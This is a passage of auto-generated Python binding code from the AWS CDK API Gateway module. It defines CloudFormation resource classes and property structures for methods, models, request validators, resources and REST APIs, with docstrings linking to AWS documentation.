:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizerid
"""
return self._values.get('authorizer_id')
@property
def integration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnMethod.IntegrationProperty"]]]:
"""``AWS::ApiGateway::Method.Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-integration
"""
return self._values.get('integration')
@property
def method_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.MethodResponseProperty"]]]]]:
"""``AWS::ApiGateway::Method.MethodResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-methodresponses
"""
return self._values.get('method_responses')
@property
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-operationname
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Method.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestmodels
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``AWS::ApiGateway::Method.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_validator_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestvalidatorid
"""
return self._values.get('request_validator_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnMethodProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnModel(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnModel"):
"""A CloudFormation ``AWS::ApiGateway::Model``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Model
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, schema: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGateway::Model``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Model.RestApiId``.
:param content_type: ``AWS::ApiGateway::Model.ContentType``.
:param description: ``AWS::ApiGateway::Model.Description``.
:param name: ``AWS::ApiGateway::Model.Name``.
:param schema: ``AWS::ApiGateway::Model.Schema``.
"""
props = CfnModelProps(rest_api_id=rest_api_id, content_type=content_type, description=description, name=name, schema=schema)
jsii.create(CfnModel, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Model.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="schema")
def schema(self) -> typing.Any:
"""``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-schema
"""
return jsii.get(self, "schema")
@schema.setter
def schema(self, value: typing.Any):
return jsii.set(self, "schema", value)
@property
@jsii.member(jsii_name="contentType")
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-contenttype
"""
return jsii.get(self, "contentType")
@content_type.setter
def content_type(self, value: typing.Optional[str]):
return jsii.set(self, "contentType", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnModelProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'content_type': 'contentType', 'description': 'description', 'name': 'name', 'schema': 'schema'})
class CfnModelProps():
def __init__(self, *, rest_api_id: str, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, schema: typing.Any=None):
"""Properties for defining a ``AWS::ApiGateway::Model``.
:param rest_api_id: ``AWS::ApiGateway::Model.RestApiId``.
:param content_type: ``AWS::ApiGateway::Model.ContentType``.
:param description: ``AWS::ApiGateway::Model.Description``.
:param name: ``AWS::ApiGateway::Model.Name``.
:param schema: ``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if name is not None: self._values["name"] = name
if schema is not None: self._values["schema"] = schema
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Model.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-restapiid
"""
return self._values.get('rest_api_id')
@property
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-contenttype
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-description
"""
return self._values.get('description')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-name
"""
return self._values.get('name')
@property
def schema(self) -> typing.Any:
"""``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-schema
"""
return self._values.get('schema')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnModelProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnModelV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnModelV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Model``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Model
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, name: str, schema: typing.Any, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Model``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Model.ApiId``.
:param name: ``AWS::ApiGatewayV2::Model.Name``.
:param schema: ``AWS::ApiGatewayV2::Model.Schema``.
:param content_type: ``AWS::ApiGatewayV2::Model.ContentType``.
:param description: ``AWS::ApiGatewayV2::Model.Description``.
"""
props = CfnModelV2Props(api_id=api_id, name=name, schema=schema, content_type=content_type, description=description)
jsii.create(CfnModelV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Model.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="schema")
def schema(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-schema
"""
return jsii.get(self, "schema")
@schema.setter
def schema(self, value: typing.Any):
return jsii.set(self, "schema", value)
@property
@jsii.member(jsii_name="contentType")
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-contenttype
"""
return jsii.get(self, "contentType")
@content_type.setter
def content_type(self, value: typing.Optional[str]):
return jsii.set(self, "contentType", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnModelV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'name': 'name', 'schema': 'schema', 'content_type': 'contentType', 'description': 'description'})
class CfnModelV2Props():
def __init__(self, *, api_id: str, name: str, schema: typing.Any, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Model``.
:param api_id: ``AWS::ApiGatewayV2::Model.ApiId``.
:param name: ``AWS::ApiGatewayV2::Model.Name``.
:param schema: ``AWS::ApiGatewayV2::Model.Schema``.
:param content_type: ``AWS::ApiGatewayV2::Model.ContentType``.
:param description: ``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html
"""
self._values = {
'api_id': api_id,
'name': name,
'schema': schema,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Model.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-apiid
"""
return self._values.get('api_id')
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-name
"""
return self._values.get('name')
@property
def schema(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-schema
"""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-contenttype
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html#cfn-apigatewayv2-model-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnModelV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRequestValidator(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRequestValidator"):
"""A CloudFormation ``AWS::ApiGateway::RequestValidator``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::RequestValidator
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, name: typing.Optional[str]=None, validate_request_body: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, validate_request_parameters: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None) -> None:
"""Create a new ``AWS::ApiGateway::RequestValidator``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::RequestValidator.RestApiId``.
:param name: ``AWS::ApiGateway::RequestValidator.Name``.
:param validate_request_body: ``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
:param validate_request_parameters: ``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
"""
props = CfnRequestValidatorProps(rest_api_id=rest_api_id, name=name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
jsii.create(CfnRequestValidator, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::RequestValidator.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RequestValidator.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="validateRequestBody")
def validate_request_body(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestbody
"""
return jsii.get(self, "validateRequestBody")
@validate_request_body.setter
def validate_request_body(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "validateRequestBody", value)
@property
@jsii.member(jsii_name="validateRequestParameters")
def validate_request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestparameters
"""
return jsii.get(self, "validateRequestParameters")
@validate_request_parameters.setter
def validate_request_parameters(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "validateRequestParameters", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRequestValidatorProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'name': 'name', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters'})
class CfnRequestValidatorProps():
def __init__(self, *, rest_api_id: str, name: typing.Optional[str]=None, validate_request_body: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, validate_request_parameters: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""Properties for defining a ``AWS::ApiGateway::RequestValidator``.
:param rest_api_id: ``AWS::ApiGateway::RequestValidator.RestApiId``.
:param name: ``AWS::ApiGateway::RequestValidator.Name``.
:param validate_request_body: ``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
:param validate_request_parameters: ``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if name is not None: self._values["name"] = name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::RequestValidator.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-restapiid
"""
return self._values.get('rest_api_id')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RequestValidator.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-name
"""
return self._values.get('name')
@property
def validate_request_body(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestBody``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestbody
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RequestValidator.ValidateRequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-requestvalidator.html#cfn-apigateway-requestvalidator-validaterequestparameters
"""
return self._values.get('validate_request_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRequestValidatorProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnResource(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnResource"):
"""A CloudFormation ``AWS::ApiGateway::Resource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Resource
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent_id: str, path_part: str, rest_api_id: str) -> None:
"""Create a new ``AWS::ApiGateway::Resource``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param parent_id: ``AWS::ApiGateway::Resource.ParentId``.
:param path_part: ``AWS::ApiGateway::Resource.PathPart``.
:param rest_api_id: ``AWS::ApiGateway::Resource.RestApiId``.
"""
props = CfnResourceProps(parent_id=parent_id, path_part=path_part, rest_api_id=rest_api_id)
jsii.create(CfnResource, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="parentId")
def parent_id(self) -> str:
"""``AWS::ApiGateway::Resource.ParentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-parentid
"""
return jsii.get(self, "parentId")
@parent_id.setter
def parent_id(self, value: str):
return jsii.set(self, "parentId", value)
@property
@jsii.member(jsii_name="pathPart")
def path_part(self) -> str:
"""``AWS::ApiGateway::Resource.PathPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-pathpart
"""
return jsii.get(self, "pathPart")
@path_part.setter
def path_part(self, value: str):
return jsii.set(self, "pathPart", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnResourceProps", jsii_struct_bases=[], name_mapping={'parent_id': 'parentId', 'path_part': 'pathPart', 'rest_api_id': 'restApiId'})
class CfnResourceProps():
def __init__(self, *, parent_id: str, path_part: str, rest_api_id: str):
"""Properties for defining a ``AWS::ApiGateway::Resource``.
:param parent_id: ``AWS::ApiGateway::Resource.ParentId``.
:param path_part: ``AWS::ApiGateway::Resource.PathPart``.
:param rest_api_id: ``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html
"""
self._values = {
'parent_id': parent_id,
'path_part': path_part,
'rest_api_id': rest_api_id,
}
@property
def parent_id(self) -> str:
"""``AWS::ApiGateway::Resource.ParentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-parentid
"""
return self._values.get('parent_id')
@property
def path_part(self) -> str:
"""``AWS::ApiGateway::Resource.PathPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-pathpart
"""
return self._values.get('path_part')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Resource.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-resource.html#cfn-apigateway-resource-restapiid
"""
return self._values.get('rest_api_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRestApi(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRestApi"):
"""A CloudFormation ``AWS::ApiGateway::RestApi``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::RestApi
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_source_type: typing.Optional[str]=None, binary_media_types: typing.Optional[typing.List[str]]=None, body: typing.Any=None, body_s3_location: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]=None, clone_from: typing.Optional[str]=None, description: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]=None, fail_on_warnings: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, name: typing.Optional[str]=None, parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, policy: typing.Any=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::RestApi``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_key_source_type: ``AWS::ApiGateway::RestApi.ApiKeySourceType``.
:param binary_media_types: ``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
:param body: ``AWS::ApiGateway::RestApi.Body``.
:param body_s3_location: ``AWS::ApiGateway::RestApi.BodyS3Location``.
:param clone_from: ``AWS::ApiGateway::RestApi.CloneFrom``.
:param description: ``AWS::ApiGateway::RestApi.Description``.
:param endpoint_configuration: ``AWS::ApiGateway::RestApi.EndpointConfiguration``.
:param fail_on_warnings: ``AWS::ApiGateway::RestApi.FailOnWarnings``.
:param minimum_compression_size: ``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
:param name: ``AWS::ApiGateway::RestApi.Name``.
:param parameters: ``AWS::ApiGateway::RestApi.Parameters``.
:param policy: ``AWS::ApiGateway::RestApi.Policy``.
:param tags: ``AWS::ApiGateway::RestApi.Tags``.
"""
